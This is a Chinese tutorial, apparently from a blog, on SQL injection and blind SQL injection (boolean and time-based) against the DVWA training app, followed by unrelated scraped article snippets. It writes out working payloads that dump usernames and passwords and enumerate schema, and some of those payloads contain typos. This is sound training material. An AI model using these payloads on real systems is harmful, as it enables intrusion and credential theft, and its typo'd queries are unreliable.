柒玥弯
柒玥弯

DVWA下的SQL注入与SQL盲注

一、SQL注入

SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。(摘自百度百科https://baike.baidu.com/item/sql%E6%B3%A8%E5%85%A5/150289?fr=aladdin)

判断方法

SQL注入分为字符型和数字型。所谓字符型,是拼接的SQL语句是利用字符来进行判断,而非数字。数字型和字符型刚好相反,拼接的SQL语句是用数字来拼接,而非字符。

LOW(初级)

1、首先先判断是否有sql注入,以及注入的类型(数字型,字符型):
执行命令1’ and ‘1’=’1
DVWA下的SQL注入与SQL盲注_第1张图片
由此可以看出来sql存在注入,且sql注入的类型为字符型。

2、开始猜解字段数
在这里插入图片描述
在尝试1和2的注入后,在3的时候报错,说明字段数为2

3、判断回显位置
DVWA下的SQL注入与SQL盲注_第2张图片4、查询数据库名称和版本
执行1’ union select version(),database()#
DVWA下的SQL注入与SQL盲注_第3张图片
5、获取数据库中的表
执行1’ union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()#
DVWA下的SQL注入与SQL盲注_第4张图片
6、获取表中的字段名“users”
1’union select 1,group_concat(table_name)from information_schema.tables where table_name=‘users’#
DVWA下的SQL注入与SQL盲注_第5张图片
7、获取字段的数据
执行1’union select user,password from users#
DVWA下的SQL注入与SQL盲注_第6张图片

Medium(中级)

1、首先查看源码
DVWA下的SQL注入与SQL盲注_第7张图片
发现加入了防字符串篡改的语句,因此此处通过直接注入字符串类型是无法成功的。

2、我们以User ID=2为例,通过burp拦截后发现此处的注入类型为数字型。
DVWA下的SQL注入与SQL盲注_第8张图片
DVWA下的SQL注入与SQL盲注_第9张图片DVWA下的SQL注入与SQL盲注_第10张图片
3、猜解SQL查询语句的字段个数
DVWA下的SQL注入与SQL盲注_第11张图片
当个数是1和2的时候都能通过,当个数为3的时候则错误,因此字段个数为2。

4、确定回显个数和回显位置
DVWA下的SQL注入与SQL盲注_第12张图片
5、获取当前的数据库和版本
DVWA下的SQL注入与SQL盲注_第13张图片
6、获取当前数据库所有表
DVWA下的SQL注入与SQL盲注_第14张图片
7、获取表中所有表的字段名,但是由于特殊字符被过滤,因此把“users”改为16进制
DVWA下的SQL注入与SQL盲注_第15张图片
8、获取字段中的数据
DVWA下的SQL注入与SQL盲注_第16张图片

High(高级)

1、首先查看源码
DVWA下的SQL注入与SQL盲注_第17张图片可以看到和Low级别一样还是字符类型的注入,只是实现了自动跳转,避免自动化SQL注入,因此我们直接可以采用Low级别的方法来SQL注入。

2、查看SQL字段数据
DVWA下的SQL注入与SQL盲注_第18张图片

二、SQL盲注

SQL盲注是指SQL注入返回的结果只有是与非或者不提示任何返回字符。针对这两种情况,我们对于SQL注入可以实现两种方法来进行,一种是布尔型,一种是时间型。下面就这两种情况分别来讨论。

布尔型

我们把级别设置为LOW级别。
1、同样,我们首先判断是否存在SQL注入,并判断注入类型
在这里插入图片描述
可看存在注入,并且是字符型。

2、猜解数据库长度
1’ and length(database())=4#
在这里插入图片描述
在尝试1,2,3后发现都是不存在的,在4的时候发现是存在的,因此数据库长度是4。

3、猜解数据库名称
(1)1’ and ascii(substr(database(),1,1))=100#
在这里插入图片描述
在尝试几次后,发现在ascii码等于100的时候显示存在因此第一个字符是‘d’。
(2)1’ and ascii(substr(database(),2,1))=118#
在这里插入图片描述
同理第二个字符是’v’。
(3)同理,插入SQL语句
1’ and ascii(substr(database(),3,1))=119#,第三个字符是’w’。
(4)执行1’ and ascii(substr(database(),4,1))=97#,得到第四个字符是’a’。
(5)得到数据库的名称为:dvwa。

4、猜解表的个数
1’and(select count(table_name)from information_schema.tabels
where table_schema=’dvwa’)=2#
在这里插入图片描述
尝试结构为1和2以及3的时候,1和2都是显示存在,当时3的时候显示不存在,因此,dvwa数据库里面有2个表。

5、猜长度
1’ and length(mid((select table_name from information_schema.tables
where table_schema=‘dvwa’ limit 0,1),1))=9#
1’ and length(mid((select table_name from information_schema.tables
where table_schema=‘dvwa’ limit 1,1),1))=5#
在这里插入图片描述
在尝试长度为1-10之间后,发现之后当结果等于9和5 的时候才显示存在。因此两张表的长度分别为5和9。

6、猜解表名
1’ and ascii(mid((select table_name from information_schema.tables
where table_schema=‘dvwa’ limit 1,1),1))=103#
在这里插入图片描述
在结果上尝试,最后得出来两个表名,分别为guestbook 和users

7、猜解列的个数
1’ and (select count(column_name) from information_schema.columns
where table_name=‘users’)=8#
在这里插入图片描述
在经过尝试1-7后都是不存在,当结果为8的时候,显示存在,因此有8列。

8、猜解列的长度
1’ and length(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 0,1),1))=7#
1’ and length(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 1,1),1))=10
1’ and length(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 3,1),1))=4#
在尝试每一列的1-10的长度的长度探索后发现,8列的长度分别为:7,10,9,4,8,6,10,12。

9、猜解8列的名称
1’ and ascii(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 3,1),1))=117#
以此方式来猜解,最后得到以下列的名称:user_id first_name last_name user password avatar last_login failed_login。

10、猜解数据(user)
1’ and (ascii(substr((select user from users limit (0,1),1),1,1)))=97#
以此方式进行猜解,最后得到user里面相关的数据有:admin,gordonb,1337,pablo,smithy。

而Medium和High和普通型中高级做法类似,在这里就不再详细描述。

时间型

我们设置级别为LOW。
1、先尝试是否有SQL注入
1’ and sleep(5)

DVWA下的SQL注入与SQL盲注_第19张图片
大约5秒后,返回显示不存在,说明存在SQL注入,并且是字符型。

2、猜解数据库长度
1’ and if(length(database())=4,sleep(5),1)#
DVWA下的SQL注入与SQL盲注_第20张图片在尝试长度总1-5中,1-4在延时大约5秒返回,但是当长度等于5时,立即返回。由此可以确定数据库长度为4。

3、猜解数据库名
1’ and if(ascii(substr(database(),1,1))=100,sleep(5),1)#
1’ and if(ascii(substr(database(),2,1))=118,sleep(5),1)#
1’ and if(ascii(substr(database(),2,1))=119,sleep(5),1)#
1’ and if(ascii(substr(database(),2,1))=117,sleep(5),1)#
DVWA下的SQL注入与SQL盲注_第21张图片
经过多次的猜解,得到数据库名称为dvwa。

4、猜解表的个数
1’ and if((select count(table_name) from information_schema.tables
where table_schema=‘dvwa’)=2,sleep(5),1)#
DVWA下的SQL注入与SQL盲注_第22张图片在尝试个数为1和2时都能延迟约5秒返回,但是在尝试个数为3的时候,直接返回,几乎没有延迟。因此可以判断出表个数为2.

5、猜解表长度
1’ and if(length(substr((select table_name from information_shchema.tables
where table_schema=‘dvwa’limit(0,1),1))=9,sleep(5),1))#
1’ and if(length(substr((select table_name from information_shchema.tables
where table_schema='dvwa’limit(1,1),1))=5,sleep(5),1))
DVWA下的SQL注入与SQL盲注_第23张图片
在尝试一个表和第二个表的长度范围1-10后,发现第一个表长度为9,第二个表长度为5.

6、猜解表名
1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=’users’limit 0,1),1))=97,sleep(5),1)#
DVWA下的SQL注入与SQL盲注_第24张图片按照此方法猜解,最后判断出两个表名分别为:guestbook和users。

7、猜解列的个数
1’ and (select count(column_name) from information_schema.columns
where table_name=‘users’)=8#
在这里插入图片描述
在经过尝试1-7后都是不存在,当结果为8的时候,显示存在,因此有8列。

8、猜解列的长度
1’ and length(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 0,1),1))=7#
1’ and length(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 1,1),1))=10
1’ and length(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 3,1),1))=4#
在尝试每一列的1-10的长度的长度探索后发现,8列的长度分别为:7,10,9,4,8,6,10,12。

9、猜解8列的名称
1’ and ascii(mid((select column_name from information_schema.columns
where table_name=‘users’ limit 3,1),1))=117#
以此方式来猜解,最后得到以下列的名称:user_id first_name last_name user password avatar last_login failed_login。

10、猜解数据(user)
1’ and (ascii(substr((select user from users limit (0,1),1),1,1)))=97#
以此方式进行猜解,最后得到user里面相关的数据有:admin,gordonb,1337,pablo,smithy
时间型中高级做法和前面叙述中高级的方法类似,这里就不再详细诉说。

你可能感兴趣的:(DVWA下的SQL注入与SQL盲注)

  • ch02离散仿真引擎基础——Unity3D学习 yesor_not 3D游戏学习c#unity游戏游戏策划
    ch02离散仿真引擎基础——Unity3D学习一、简答题1.解释游戏对象(GameObjects)和资源(Assets)的区别与联系游戏对象(GameObjects):一般为玩家,敌人,环境等资源(Assets):一般包括声音,脚本,材质等区别与联系:对象一般是一些资源的集合体资源可以被多个对象使用资源作为模版,可实例化游戏中具体的对象。2、下载几个游戏案例,分别总结资源、对象组织的结构(指资源的
  • lua 5.1语法约定 xiejunna java
    Lua5.1参考手册由罗伯特·Ierusalimschy路易斯HenriquedeFigueiredo沃尔德蔡氏‚一个版权©2006A¢A€“2012Lua.org,银行业者。免费的根据Lua许可证。内容一个‚·指数一个‚·其他版本一个‚·英语一个‚·portuguAƒAª年代一个‚·espaAƒA±ol1A¢A€“介绍Lua是一个扩展编程语言设计的支持一般过程式编程与数据描述设施。它还提供了很好
  • vue h函数 月下第一风流 vue.jsjavascript前端
    在Vue.js中,h函数是用于在渲染函数中创建虚拟DOM元素的主要工具。但是,除了h函数之外,还有其他一些辅助函数和工具可以用于渲染函数和组件开发。以下是一些常见的工具和函数:createApp:用于创建Vue应用程序的实例。在Vue3中,这是启动应用的主要方法。defineComponent:用于定义一个组件。在Vue3中,这是一种定义组件的选项式API的替代方法。resolveComponen
  • 【瀑布流插件】vue-masonry 春晓_春眠花落 vue.jsjavascript前端
    **最近一直在画静态页面,有个图片列表,布局很紧凑,图片宽度一样,高度不一样,但是效果图上都是紧挨在一起,我用普通的v-for循环加css布局,它会以这一行最高的那张图片的高度为准,导致图片高度小的,下一行不能紧挨在一起**如图:但是我要的效果是这样的,如图:依靠vue-masonry,实现了一些简单的功能,可参考这篇文章,讲的比较详细《Vue插件》瀑布流插件vue-masonry的使用与踩坑记录
  • vue3 - 【完整源码】实现网页整屏大量图片、div 容器的自适应瀑布流布局,宽高度不固定的列表式瀑布流展示效果(高效无 BUG 网站瀑布流效果,超详细代码注释,可根据需求快速进行改造!) 街尾杂货店& 前端组件与功能(开箱即用)vue3瀑布流布局详细教程vue3图片列表瀑布流组件宽高不固定的div实现瀑布vue3最好用的瀑布流组件插件vue3瀑布流布局完整示例源码
    效果图在vue3.js网站项目中,实现图片、普通div容器的瀑布流效果完整示例,支持动态加载数据、自定义一行放多少个、各列之间的间距等等!你可以直接复制组件源码,按照配置文档稍微改改就能用到你的项目中去了,比绝大部分文章提供的示例都要流畅、快速。核心组件源码组件的存放位置无所谓,最后使用的时候能正确引入就行了。创建瀑布流组件Waterfall.vue,复制代码。
  • 语音与自然语言处理(NLP):智能交互的核心技术 给生活加糖! 热门知识自然语言处理交互人工智能
    随着人工智能(AI)技术的飞速发展,语音识别与自然语言处理(NaturalLanguageProcessing,NLP)成为了智能交互系统的核心技术。它们不仅改变了人们与计算机、设备的交互方式,也推动了众多行业的革新。从智能助手(如苹果的Siri、亚马逊的Alexa)到机器翻译、自动客服系统,语音和NLP技术正逐步融入日常生活,改善我们与数字世界的沟通方式。一、什么是语音识别与自然语言处理(NLP
  • Leetcode952. 按公因数计算最大组件大小 hhhcbw 力扣刷题笔记leetcode算法c++
    题目链接点我(^_^)题目大意比如nums=[4,6,15,35]答案就是4,nums=[20,50,9,63]答案就是2。解题思路我的思路是对nums数组中的每一个数进行质因数分解,那么对于每一个因数可以维护一个并查集,对于一个数字将其质因数分解后的所有因子可以看作是一个连通集合。这样在线维护并查集大小即可。素数筛+质因子分解+并查集,时间复杂度为O(mlogn),m为数组大小,n为数字大小。当
  • asp.net javascrip获取session的值_一篇文章搞定 Django Cookie 与 Session weixin_39962285 asp.nethtml获取session的值session保存密码session失效前端怎么获取session的值
    cookieCookie的由来大家都知道HTTP协议是无状态的。无状态的意思是每次请求都是独立的,它的执行情况和结果与前面的请求和之后的请求都无直接关系,它不会受前面的请求响应情况直接影响,也不会直接影响后面的请求响应情况。一句有意思的话来描述就是人生只如初见,对服务器来说,每次的请求都是全新的。状态可以理解为客户端和服务器在某次会话中产生的数据,那无状态的就以为这些数据不会被保留。会话中产生的数
  • redis压力测试 weixin_33845881 数据库
    redis自带的redis-benchmark工具Redis自带了一个叫redis-benchmark的工具来模拟N个客户端同时发出M个请求。(类似于Apacheab程序)。你可以使用redis-benchmark-h来查看基准参数。1使用方法redis-benchmark[-h][-p][-c][-n[-k]序号选项描述默认值1-h指定redisserver主机名localhost2-p指定re
  • Lua 5.1中文编程手册:全面指南与实践 元楼
    本文还有配套的精品资源,点击获取简介:Lua是一种轻量级脚本语言,常嵌入到应用程序中提供扩展性。本手册是Lua5.1版本的官方文档中文翻译,涵盖了语法、特性到使用方法的全面指南。内容包括基础语法、数据类型、表、控制结构、函数、模块、元编程、错误处理、C接口、垃圾收集、线程及标准库等关键概念。此外,还包含如何解压和使用手册的说明。手册适用于各级别开发者,并为多个应用领域提供了实践指导。1.Lua语言
  • Lua 5.1 参考手册 weixin_30822451
    Lua5.1参考手册byRobertoIerusalimschy,LuizHenriquedeFigueiredo,WaldemarCeles云风译www.codingnow.comCopyright©2006Lua.org,PUC-Rio.Allrightsreserved.1-介绍Lua是一个扩展式程序设计语言,它被设计成支持通用的过程式编程,并有相关数据描述的设施。Lua也能对面向对象编程,
  • Python学习教程:必须掌握的Cookie知识点都在这里了 weixin_30387339 python爬虫javascriptViewUI
    今天我们来全面了解一下Cookie(小饼干)相关的知识!篇幅有点长,在学习Python的伙伴或者有兴趣的你,可以耐心看哦!相信很多同学肯定听过Cookie这个东西,也大概了解其作用,但是其原理以及如何设置,可能没有做过web的同学并不是非常清楚,以前的Python学习教程中其实有跟大家提到过,那今天就带大家详细了解下Cookie相关的知识!一、诞生背景爬虫系列教程的第一篇:HTTP详解中我们便说过
  • Knox原理与代码实例讲解 AI天才研究院 计算DeepSeekR1&大数据AI人工智能大模型计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    Knox原理与代码实例讲解1.背景介绍在现代分布式系统中,安全性和隔离性是非常重要的需求。ApacheKnox是一个反向代理服务器,旨在为ApacheHadoop集群提供单一入口点,增强安全性和集中化管理。它位于Hadoop集群与客户端应用程序之间,充当网关和负载均衡器的角色。Knox的主要目标是:提供集中式身份验证和授权,减轻客户端应用程序的负担。实现多租户支持,允许不同的组织或部门安全地共享同
  • Shiro 框架详解 大家都说我身材好 Java高级springjavashiro
    Shiro是一款轻量级的Java安全框架,提供了身份认证、授权、加密和会话管理等功能。它可以集成到任何JavaWeb应用程序中,并且易于使用和扩展。Shiro的设计理念是简洁而灵活,不仅可以应用于Web应用程序,还可以应用于命令行、移动设备和分布式系统等各种应用场景。1.Shiro的概述Shiro是一个开源的Java安全框架,由Apache开发和维护。Shiro可以帮助开发人员快速实现安全特性,包
  • 算法基础1.3:双指针,位运算,离散化,区间合并 sunluyang521 算法基础算法
    双指针for(inti=0,j=0;iusingnamespacestd;constintN=100010;intn;intq[N],s[N];//s存的是当前j到i这个区间里面每一个数出现的次数。intmain(){scanf("%d",&n);for(inti=0;i1)s[q[j++]]--;//有重复的数,把它拿出去,表示这个数减1res=max(res,i-j+1);//更新答案}cou
  • Spring依赖注入 优人ovo springjavajunit
    引言Spring最核心的可以说是依赖注入,本文将详细阐述bean注入的两大方法基于XML配置1.检查Bean定义在applicationContext.xml文件中,设置我们想要注入的Bean定义。通常,一个Bean定义的格式如下:在上述示例中,id属性指定了Bean的名称为student,class属性指定了该Bean对应的Java类的全限定名。2.确保配置文件被加载要保证application
  • Spring常用注解和组件 优人ovo springjava数据库
    引言了解Spring常用注解的使用方式可以帮助我们更快速理解这个框架和其中的深度注解@Configuration:表示该类是一个配置类,用于定义SpringBean。@EnableAutoConfiguration:启用SpringBoot的自动配置功能,让SpringBoot根据类路径中的依赖自动配置应用。@ComponentScan:启用组件扫描,SpringBoot会扫描该类所在包及其子包下
  • 常见数据结构的简介(基本概念 & 操作 & 时间复杂度) 子诚之 编程
    文章目录0.概览1.线性表、栈和队列2.数组2.1基本操作1)时间复杂度2)案例3.字符串3.1存储结构3.2基本操作1)时间复杂度2)案例:最大公共字符串4.二叉树4.1储存结构4.2基本操作1)时间复杂度2)案例:使用字典树判断字符串是否存在5.哈希/散列表5.1哈希函数5.2基本操作1)时间复杂度2)案例:构建哈希表《重学数据结构与算法》学习笔记0.概览数据结构增删查特点线性表变长栈队列数组
  • 贴现率(Discount Rate):投资决策中的关键因素(中英双语) 阿正的梦工坊 Finance金融
    贴现率(DiscountRate):投资决策中的关键因素引言在金融分析和投资决策中,贴现率(DiscountRate)是一个至关重要的概念,它决定了未来现金流的现值,直接影响项目投资、企业估值、债券定价等关键决策。本文将深入解析:什么是贴现率?贴现率在投资分析中的作用如何计算贴现率?为什么贴现率难以预测?1.什么是贴现率?贴现率是用于将未来现金流转换为现值(PresentValue,PV)的比率。
  • 如何了解您的手机是否已经被黑客攻击 黑客Ash 网络安全web安全php
    当您遇到诸如数据使用流量超过正常水平、出现未下载安装的新应用、不寻常或不正当的弹出窗口等警告迹象时,您可以知道您的手机是否已经被黑客攻击。继续阅读,了解表明您的手机已被黑客攻击或正在被攻击的警告迹象,以及如果您发现手机被黑客攻击时您可以采取的措施。1.异常的或不正当的弹出窗口一个手机被黑客攻击的迹象是,您在使用手机时注意到有弹出窗口。有些弹出窗口甚至有不正当的内容。手机上出现的无理由的弹出窗口是手
  • Python学习,cookie和session sehun_sx python数据挖掘开发语言python学习学习
    用户登录,未登录不能访问指定页面基于cookie实现保存在用户浏览器端的键值对,向服务端发请求时会自动携带deflogin(request):#设置cookiedata=redirect('...')data.set_cookie()#读取cookierequest.COOKIES.get('xx')returndatacookie的三个参数:key,value='',max_age=None应用
  • 论deepseek软件底层原理 星糖曙光 磨刀不误砍柴工(工具重要性)AI作画经验分享人工智能笔记
    DeepSeek软件底层原理剖析一、核心架构基石(一)混合专家架构(MoE)架构本质:MoE架构模拟人类专家协作模式,构建一个专家集合。每个专家模块专门负责特定类型或领域知识的处理。任务分配机制:当模型面临输入任务时,类似智能调度系统的“路由器”会分析任务特征,将其导向最适配的专家模块。如处理医学文本时,将任务分配给擅长医学知识处理的专家,避免通用模块处理的低效性,极大提升计算效率与任务处理的针对
  • 常见解题方法(位运算、双指针、前缀和) wibkb java排序算法快速排序
    目录位运算双指针前缀和对于自己刷题过程中遇到的一些常见简单解题方法进行了一个总结:数组在数据结构中是线性表的一种,在算法题中常常以整数数组和字符串等形式展现,其实数组中包含有更多的数据类型,这一段主要说明整数数组的一些常见问题解法;数组的一个特点,可以通过下标对于数据进行一个快速访问,即a[i]=xx;位运算本质上应该算在数学系算法的一大类,通过数组中的各个数进行一个位运算来获得最终的结果。位运算
  • app,waf笔记 qq_45981247 笔记
    API攻防知识点:1、HTTP接口类-测评2、RPC类接口-测评3、WebService类-测评内容点:SOAP(SimpleObjectAccessProtocol)简单对象访问协议是交换数据的一种协议规范,是一种轻量级的、简单的、基于XML(标准通用标记语言下的一个子集)的协议,它被设计成在WEB上交换结构化的和固化的信息。SOAP部署WebService的专有协议。SOAP使用HTTP来发送
  • Pandas使用教程 - 多级索引 (MultiIndex) 闲人编程 Pandas使用教程pandasMultiIndex多级索引元组分组聚合python
    目录1.什么是MultiIndex?2.MultiIndex的创建2.1从多个数组或列表创建MultiIndex2.2从元组列表创建MultiIndex2.3使用DataFrame的set_index()创建MultiIndex3.MultiIndex的基本操作3.1索引与切片3.1.1访问特定级别的数据3.1.2使用xs()方法进行跨层次切片3.2重新排列和重设索引3.2.1swaplevel(
  • Python学习之cookies及session用法 一个人旅行*-* PythonPythoncookiessession
    当想利用Python在网页上发表评论的时候,需要一些账号密码登录的信息,这个时候用requests.get()请求的话,账号密码全部会显示在网址上,这显然不科学!这个时候需要用post请求,可以这么理解,get是明文显示,post是非明文显示。通常,get请求会应用于获取网页数据,比如我们之前学的requests.get()。post请求则应用于向网页提交数据,比如提交表单类型数据(像账号密码就是
  • Python随机森林算法详解与案例实现 闲人编程 python算法python随机森林数据分析人工智能
    目录Python随机森林算法详解与案例实现1、随机森林算法概述2、随机森林的原理3、实现步骤4、分类案例:使用随机森林预测鸢尾花品种4.1数据集介绍4.2代码实现4.3代码解释4.4运行结果5、回归案例:使用随机森林预测波士顿房价5.1数据集介绍5.2代码实现5.3代码解释5.4运行结果6、随机森林的优缺点7、改进方向8、应用场景9、总结Python随机森林算法详解与案例实现1、随机森林算法概述随
  • Python 循环神经网络(RNN)算法详解与应用案例 闲人编程 pythonpythonrnn算法循环神经网络深度学习文本生成
    目录Python循环神经网络(RNN)算法详解与应用案例引言一、RNN的基本原理1.1RNN的结构1.2RNN的优势与挑战二、Python中RNN的面向对象实现2.1`RNNCell`类的实现2.2`RNNModel`类的实现2.3`Trainer`类的实现三、案例分析3.1序列预测3.1.1数据准备3.1.2模型训练3.1.3结果分析3.2文本生成3.2.1数据准备3.2.2模型训练3.2.3文
  • Redis压力测试 破 风 redisredis
    首先我们进入到redis里面去:dockerexec-itredis/bin/bash压力测试命令:redis-benchmark-h127.0.0.1-p6379-c100-n100000性能SET分析:上面只是简单的GET请求压力测试数据分析,包括set看法和上面同理。压力测试命令讲解:-h主机-p端口-c并发连接数-n请求数-s指定服务器socket
  • DeepSeek 助力 Vue 开发:打造丝滑的开关切换(Switch) 宝码香车 #DeepSeekvue.js前端javascriptDeepSeekecmascript
    前言:哈喽,大家好,今天给大家分享一篇文章!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏+关注哦目录DeepSeek助力Vue开发:打造丝滑的开关切换(Switch)前言进入安装好的DeepSeek页面效果指令输入think组件代码组件特点说明:额外建议:代码测试页面效果自己部署DeepSeek安装地址相关文章️✍️️️️⚠️⬇️·正文开始
  • 书其实只有三类 西蜀石兰
    一个人一辈子其实只读三种书,知识类、技能类、修心类。 知识类的书可以让我们活得更明白。类似十万个为什么这种书籍,我一直不太乐意去读,因为单纯的知识是没法做事的,就像知道地球转速是多少一样(我肯定不知道),这种所谓的知识,除非用到,普通人掌握了完全是一种负担,维基百科能找到的东西,为什么去记忆? 知识类的书,每个方面都涉及些,让自己显得不那么没文化,仅此而已。社会认为的学识渊博,肯定不是站在
  • 《TCP/IP 详解,卷1:协议》学习笔记、吐槽及其他 bylijinnan tcp
    《TCP/IP 详解,卷1:协议》是经典,但不适合初学者。它更像是一本字典,适合学过网络的人温习和查阅一些记不清的概念。 这本书,我看的版本是机械工业出版社、范建华等译的。这本书在我看来,翻译得一般,甚至有明显的错误。如果英文熟练,看原版更好: http://pcvr.nl/tcpip/ 下面是我的一些笔记,包括我看书时有疑问的地方,也有对该书的吐槽,有不对的地方请指正: 1.
  • Linux—— 静态IP跟动态IP设置 eksliang linuxIP
    一.在终端输入 vi /etc/sysconfig/network-scripts/ifcfg-eth0 静态ip模板如下: DEVICE="eth0" #网卡名称 BOOTPROTO="static" #静态IP(必须) HWADDR="00:0C:29:B5:65:CA" #网卡mac地址 IPV6INIT=&q
  • Informatica update strategy transformation 18289753290
    更新策略组件: 标记你的数据进入target里面做什么操作,一般会和lookup配合使用,有时候用0,1,1代表 forward  rejected rows被选中,rejected row是输出在错误文件里,不想看到reject输出,将错误输出到文件,因为有时候数据库原因导致某些column不能update,reject就会output到错误文件里面供查看,在workflow的
  • 使用Scrapy时出现虽然队列里有很多Request但是却不下载,造成假死状态 酷的飞上天空 request
    现象就是: 程序运行一段时间,可能是几十分钟或者几个小时,然后后台日志里面就不出现下载页面的信息,一直显示上一分钟抓取了0个网页的信息。 刚开始已经猜到是某些下载线程没有正常执行回调方法引起程序一直以为线程还未下载完成,但是水平有限研究源码未果。 经过不停的google终于发现一个有价值的信息,是给twisted提出的一个bugfix 连接地址如下http://twistedmatrix.
  • 利用预测分析技术来进行辅助医疗 蓝儿唯美 医疗
    2014年,克利夫兰诊所(Cleveland Clinic)想要更有效地控制其手术中心做膝关节置换手术的费用。整个系统每年大约进行2600例此类手术,所以,即使降低很少一部分成本,都可以为诊 所和病人节约大量的资金。为了找到适合的解决方案,供应商将视野投向了预测分析技术和工具,但其分析团队还必须花时间向医生解释基于数据的治疗方案意味着 什么。  克利夫兰诊所负责企业信息管理和分析的医疗
  • java 线程(一):基础篇 DavidIsOK java多线程线程
                                                            &nbs
  • Tomcat服务器框架之Servlet开发分析 aijuans servlet
    最近使用Tomcat做web服务器,使用Servlet技术做开发时,对Tomcat的框架的简易分析: 疑问: 为什么我们在继承HttpServlet类之后,覆盖doGet(HttpServletRequest req, HttpServetResponse rep)方法后,该方法会自动被Tomcat服务器调用,doGet方法的参数有谁传递过来?怎样传递? 分析之我见: doGet方法的
  • 揭秘玖富的粉丝营销之谜 与小米粉丝社区类似 aoyouzi 揭秘玖富的粉丝营销之谜
    玖富旗下悟空理财凭借着一个微信公众号上线当天成交量即破百万,第七天成交量单日破了1000万;第23天时,累计成交量超1个亿……至今成立不到10个月,粉丝已经超过500万,月交易额突破10亿,而玖富平台目前的总用户数也已经超过了1800万,位居P2P平台第一位。很多互联网金融创业者慕名前来学习效仿,但是却鲜有成功者,玖富的粉丝营销对外至今仍然是个谜。     近日,一直坚持微信粉丝营销
  • Java web的会话跟踪技术 百合不是茶 url会话Cookie会话Seession会话Java Web隐藏域会话
    会话跟踪主要是用在用户页面点击不同的页面时,需要用到的技术点   会话:多次请求与响应的过程     1,url地址传递参数,实现页面跟踪技术          格式:传一个参数的 url?名=值     传两个参数的 url?名=值 &名=值   关键代码
  • web.xml之Servlet配置 bijian1013 javaweb.xmlServlet配置
    定义: <servlet> <servlet-name>myservlet</servlet-name> <servlet-class>com.myapp.controller.MyFirstServlet</servlet-class> <init-param> <param-name>
  • 利用svnsync实现SVN同步备份 sunjing SVN同步E000022svnsync镜像
    1. 在备份SVN服务器上建立版本库    svnadmin create test 2. 创建pre-revprop-change文件     cd test/hooks/     cp pre-revprop-change.tmpl pre-revprop-change 3. 修改pre-revprop-
  • 【分布式数据一致性三】MongoDB读写一致性 bit1129 mongodb
    本系列文章结合MongoDB,探讨分布式数据库的数据一致性,这个系列文章包括: 数据一致性概述与CAP 最终一致性(Eventually Consistency) 网络分裂(Network Partition)问题 多数据中心(Multi Data Center) 多个写者(Multi Writer)最终一致性 一致性图表(Consistency Chart) 数据
  • Anychart图表组件-Flash图转IMG普通图的方法 白糖_ Flash
    问题背景:项目使用的是Anychart图表组件,渲染出来的图是Flash的,往往一个页面有时候会有多个flash图,而需求是让我们做一个打印预览和打印功能,让多个Flash图在一个页面上打印出来。   那么我们打印预览的思路是获取页面的body元素,然后在打印预览界面通过$("body").append(html)的形式显示预览效果,结果让人大跌眼镜:Flash是
  • Window 80端口被占用 WHY? bozch 端口占用window
    平时在启动一些可能使用80端口软件的时候,会提示80端口已经被其他软件占用,那一般又会有那些软件占用这些端口呢?    下面坐下总结:         1、web服务器是最经常见的占用80端口的,例如:tomcat , apache  , IIS , Php等等;         2
  • 编程之美-数组的最大值和最小值-分治法(两种形式) bylijinnan 编程之美
    import java.util.Arrays; public class MinMaxInArray { /** * 编程之美 数组的最大值和最小值 分治法 * 两种形式 */ public static void main(String[] args) { int[] t={11,23,34,4,6,7,8,1,2,23}; int[]
  • Perl正则表达式 chenbowen00 正则表达式perl
    首先我们应该知道 Perl 程序中,正则表达式有三种存在形式,他们分别是: 匹配:m/<regexp>;/ (还可以简写为 /<regexp>;/ ,略去 m) 替换:s/<pattern>;/<replacement>;/ 转化:tr/<pattern>;/<replacemnt>;
  • [宇宙与天文]行星议会是否具有本行星大气层以外的权力呢? comsci
          举个例子: 地球,地球上由200多个国家选举出一个代表地球联合体的议会,那么现在地球联合体遇到一个问题,地球这颗星球上面的矿产资源快要采掘完了....那么地球议会全体投票,一致通过一项带有法律性质的议案,既批准地球上的国家用各种技术手段在地球以外开采矿产资源和其它资源........    &
  • Oracle Profile 使用详解 daizj oracleprofile资源限制
    Oracle Profile 使用详解 转 一、目的: Oracle系统中的profile可以用来对用户所能使用的数据库资源进行限制,使用Create Profile命令创建一个Profile,用它来实现对数据库资源的限制使用,如果把该profile分配给用户,则该用户所能使用的数据库资源都在该profile的限制之内。 二、条件: 创建profile必须要有CREATE PROFIL
  • How HipChat Stores And Indexes Billions Of Messages Using ElasticSearch & Redis dengkane elasticsearchLucene
    This article is from an interview with Zuhaib Siddique, a production engineer at HipChat, makers of group chat and IM for teams. HipChat started in an unusual space, one you might not
  • 循环小示例,菲波拉契序列,循环解一元二次方程以及switch示例程序 dcj3sjt126com c算法
    # include <stdio.h> int main(void) { int n; int i; int f1, f2, f3; f1 = 1; f2 = 1; printf("请输入您需要求的想的序列:"); scanf("%d", &n); for (i=3; i<n; i
  • macbook的lamp环境 dcj3sjt126com lamp
      sudo vim /etc/apache2/httpd.conf   /Library/WebServer/Documents 是默认的网站根目录   重启Mac上的Apache服务   这个命令很早以前就查过了,但是每次使用的时候还是要在网上查: 停止服务:sudo /usr/sbin/apachectl stop 开启服务:s
  • java ArrayList源码 下 shuizhaosi888 ArrayList源码
    版本 jdk-7u71-windows-x64   JavaSE7 ArrayList源码上:http://flyouwith.iteye.com/blog/2166890     /** * 从这个列表中移除所有c中包含元素 */ public boolean removeAll(Collection<?> c) {
  • Spring Security(08)——intercept-url配置 234390216 Spring Securityintercept-url访问权限访问协议请求方法
    intercept-url配置 目录 1.1     指定拦截的url 1.2     指定访问权限 1.3     指定访问协议 1.4     指定请求方法   1.1   &n
  • Linux环境下的oracle安装 jayung oracle
